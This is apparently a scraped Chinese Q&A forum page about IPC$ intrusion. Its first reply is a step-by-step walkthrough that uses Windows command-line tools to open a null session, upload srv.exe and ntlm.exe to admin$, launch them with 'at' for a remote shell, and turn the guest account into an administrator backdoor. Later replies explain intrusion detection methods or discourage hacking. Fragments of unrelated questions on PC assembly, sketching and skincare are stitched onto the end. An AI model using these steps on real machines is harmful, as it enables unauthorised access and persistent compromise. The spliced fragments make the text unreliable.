1樓:匿名使用者
原理:ipc$(internet process connection)是共享"命名管道"的資源,它是為了讓程序間通訊而開放的命名管道,通過提供可信任的使用者名稱和口令,連線雙方可以建立安全的通道並以此通道進行加密資料的交換,從而實現對遠端計算機的訪問。ipc$是nt/2000的一項新功能,它有一個特點,即在同一時間內,兩個ip之間只允許建立一個連線。
nt/2000在提供了ipc$功能的同時,在初次安裝系統時還開啟了預設共享,即所有的邏輯共享(c$,d$,e$……)和系統目錄winnt或windows(admin$)共享。所有的這些,微軟的初衷都是為了方便管理員的管理,但在有意無意中,導致了系統安全性的降低。 平常所說的ipc$漏洞並不是一個真正意義上的漏洞,一定是指微軟自己安置的那個「後門」:
空會話(null session)。方法:1.
c:\>net use \\127.0.
0.1\ipc$ "" /user:"admintitrators" 這是用《流光》掃到的使用者名稱是administrators,密碼為"空"的ip地址(空口令?
哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.
1建立一個連線,因為密碼為"空",所以第一個引號處就不用輸入,後面一個雙引號裡的是使用者名稱,輸入administrators,命令即可成功完成。 2. c:
\>copy srv.exe \\127.0.
0.1\admin$ 先複製srv.exe上去,在流光的tools目錄下就有(這裡的$是指admin使用者的c:
\winnt\system32\,大家還可以使用c$、d$,意思是c盤與d盤,這看你要複製到什麼地方去了)。 3. c:
\>net time \\127.0.0.
1 查查時間,發現127.0.0.
1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。 4.
c:\>at \\127.0.
0.1 11:05 srv.
exe 用at命令啟動srv.exe吧(這裡設定的時間要比主機時間快,不然你怎麼啟動啊,呵呵!) 5.
c:\>net time \\127.0.
0.1 再查查到時間沒有?如果127.
0.0.1 的當前時間是 2002/3/19 上午 11:
05,那就準備開始下面的命令。 6. c:
\>telnet 127.0.0.
1 99 這裡會用到telnet命令吧,注意埠是99。telnet預設的是23埠,但是我們使用的是srv在對方計算機中為我們建立一個99埠的shell。 雖然我們可以telnet上去了,但是srv是一次性的,下次登入還要再啟用!
所以我們打算建立一個telnet服務!這就要用到ntlm了 7.c:
\>copy ntlm.exe \\127.0.
0.1\admin$ 用copy命令把ntlm.exe上傳到主機上(ntlm.
exe也是在《流光》的tools目錄中)。 8. c:
\winnt\system32>ntlm 輸入ntlm啟動(這裡的c:\winnt\system32>指的是對方計算機,執行ntlm其實是讓這個程式在對方計算機上執行)。當出現"done"的時候,就說明已經啟動正常。
然後使用"net start telnet"來開啟telnet服務! 9. telnet 127.
0.0.1,接著輸入使用者名稱與密碼就進入對方了,操作就像在dos上操作一樣簡單!
(然後你想做什麼?想做什麼就做什麼吧,哈哈) 為了以防萬一,我們再把guest啟用加到管理組 10. c:
\>net user guest /active:yes 將對方的guest使用者啟用 11. c:
\>net user guest 1234 將guest的密碼改為1234,或者你要設定的密碼 12. c:\>net localgroup administrators guest /add 將guest變為administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這臺計算機)
簡述入侵檢測常用的四種方法 5
2樓:wuli小亮仔
入侵檢測系統所採用的技術可分為特徵檢測與異常檢測兩種。
1、特徵檢測
特徵檢測(signature-based detection) 又稱misuse detection ,這一檢測假設入侵者活動可以用一種模式來表示,系統的目標是檢測主體活動是否符合這些模式。
它可以將已有的入侵方法檢查出來,但對新的入侵方法無能為力。其難點在於如何設計模式既能夠表達「入侵」現象又不會將正常的活動包含進來。
2、異常檢測
異常檢測(anomaly detection) 的假設是入侵者活動異常於正常主體的活動。根據這一理念建立主體正常活動的「活動簡檔」,將當前主體的活動狀況與「活動簡檔」相比較,當違反其統計規律時,認為該活動可能是「入侵」行為。
異常檢測的難題在於如何建立「活動簡檔」以及如何設計統計演算法,從而不把正常的操作作為「入侵」或忽略真正的「入侵」行為。
擴充套件資料
入侵分類:
1、基於主機
一般主要使用作業系統的審計、跟蹤日誌作為資料來源,某些也會主動與主機系統進行互動以獲得不存在於系統日誌中的資訊以檢測入侵。
這種型別的檢測系統不需要額外的硬體.對網路流量不敏感,效率高,能準確定位入侵併及時進行反應,但是佔用主機資源,依賴於主機的可靠性,所能檢測的攻擊型別受限。不能檢測網路攻擊。
2、基於網路
通過被動地監聽網路上傳輸的原始流量,對獲取的網路資料進行處理,從中提取有用的資訊,再通過與已知攻擊特徵相匹配或與正常網路行為原型相比較來識別攻擊事件。
此類檢測系統不依賴作業系統作為檢測資源,可應用於不同的作業系統平臺;配置簡單,不需要任何特殊的審計和登入機制;可檢測協議攻擊、特定環境的攻擊等多種攻擊。
但它只能監視經過本網段的活動,無法得到主機系統的實時狀態,精確度較差。大部分入侵檢測工具都是基於網路的入侵檢測系統。
3、分散式
這種入侵檢測系統一般為分散式結構,由多個部件組成,在關鍵主機上採用主機入侵檢測,在網路關鍵節點上採用網路入侵檢測,同時分析來自主機系統的審計日誌和來自網路的資料流,判斷被保護系統是否受到攻擊。
3樓:下個id我們再見
1)特徵檢測
特徵檢測對已知的攻擊或入侵的方式作出確定性的描述,形成相應的事件模式。當被審計的事件與已知的入侵事件模式相匹配時,即報警。原理上與專家系統相仿。
其檢測方法上與計算機病毒的檢測方式類似。目前基於對包特徵描述的模式匹配應用較為廣泛。該方法預報檢測的準確率較高,但對於無經驗知識的入侵與攻擊行為無能為力。
2)統計檢測
統計模型常用異常檢測,在統計模型中常用的測量引數包括:審計事件的數量、間隔時間、資源消耗情況等。
統計方法的最大優點是它可以「學習」使用者的使用習慣,從而具有較高檢出率與可用性。但是它的「學習」能力也給入侵者以機會通過逐步「訓練」使入侵事件符合正常操作的統計規律,從而透過入侵檢測系統。
3)專家系統
用專家系統對入侵進行檢測,經常是針對有特徵入侵行為。所謂的規則,即是知識,不同的系統與設定具有不同的規則,且規則之間往往無通用性。專家系統的建立依賴於知識庫的完備性,知識庫的完備性又取決於審計記錄的完備性與實時性。
入侵的特徵抽取與表達,是入侵檢測專家系統的關鍵。在系統實現中,將有關入侵的知識轉化為if-then結構(也可以是複合結構),條件部分為入侵特徵,then部分是系統防範措施。運用專家系統防範有特徵入侵行為的有效性完全取決於專家系統知識庫的完備性。
4)檔案完整性檢查
檔案完整性檢查系統檢查計算機中自上次檢查後檔案變化情況。檔案完整性檢查系統儲存有每個檔案的數字文摘資料庫,每次檢查時,它重新計算檔案的數字文摘並將它與資料庫中的值相比較,如不同,則檔案已被修改,若相同,檔案則未發生變化。
檔案的數字文摘通過hash函式計算得到。不管檔案長度如何,它的hash函式計算結果是一個固定長度的數字。與加密演算法不同,hash演算法是一個不可逆的單向函式。
採用安全性高的hash演算法,如md5、sha時,兩個不同的檔案幾乎不可能得到相同的hash結果。從而,當檔案一被修改,就可檢測出來。在檔案完整性檢查中功能最全面的當屬tripwire。
4樓:暴走少爺
★複製別人的供你參考★基礎:
黑客dos命令或其它命令入侵他人電腦的具體步驟?
5樓:東門雲霞閉夜
dos命令很少有人用了,主要是不安全,費時間,強行獲去口令是很麻煩的,試著去學ipc入侵吧,
6樓:蓋昆明委琨
現在幾乎不存在黑客dos純命令入侵了啊,因為獲取口令,強行開啟服務,種植木馬,這些用純口令根本是神經才用,軟體方便幾百倍,但是前提是你自己會寫這方面軟體,不要藉助別人的,想學計算機,先搞定計算機語言吧,別老想著入侵別人啊,萬一你不小心碰到高手,哭吧!意外造成大損失就坐籠子了,黑客不是專門做黑事的,本事沒到家還是先安靜學學隱藏行蹤,屏弊跟蹤,,沒學好這些前別搞入侵,更不要做壞事,閘道器的固定記錄放著呢。不要認為跳板萬能。
學實際的,程式設計先搞巨集
7樓:匿名使用者
靠,要是dos能入侵電腦
你以為微軟吃白飯的啊
什麼是ipc$連線,如何建立ipc$連線!
8樓:自由理想
net use \\ip\ipc$ "passwrod" /user:user
這樣就建立了一條ipc$通道。
關於ipc$入侵
電腦裝機的步驟是什麼,組裝電腦的基本步驟有哪些
1 將cpu和風扇安裝到主機板上 2 把主機板安裝到主機箱內 3 連線主機板與主機箱的線,有電源按鈕,還有要把機箱電源的與主機板相連的線連線好 4 將顯示卡,音效卡,網絡卡接到主機板上。如選購機箱時,要注意內部結構合理化,便於安裝,二要注意美觀,顏色與其他配件相配。一般應選擇立式機箱,不要使用已淘汰...
畫速寫的基本步驟是什麼,畫人物速寫的步驟,講詳細點,最好有詳細的步驟圖?
1,臨摹開始 初學者面對物象往往會覺得無從下手,臨摹可以快速入門。通過臨摹,一方面可以感受速寫基本樣式,為今後應用儲備知識 另一方面臨摹本身也可以提高造型能力,特別是手感 筆感,多臨多畫就能生成。臨摹應從規範嚴謹的作品開始,切忌油滑,以免形成不良習氣。2,結構入手 人物速寫要求結構和比例準確,這種準...
護膚的基本三步是什麼,正確的護膚步驟是什麼
護膚最基本的三步 適當的清潔 恰當的保溼 永不知疲倦的防晒 這三步每一步都很重要,一定要選一個的話,我選防晒,因為陽光中的紫外線會引起很多問題,像變黑 長斑 長痘 加重過敏敏感 讓 炎症增加等。最主要還是會變老,光老化比自然老化嚴重很多,年輕時候不防晒,十年後你看起來就會比同齡人老很多 第一步,清潔...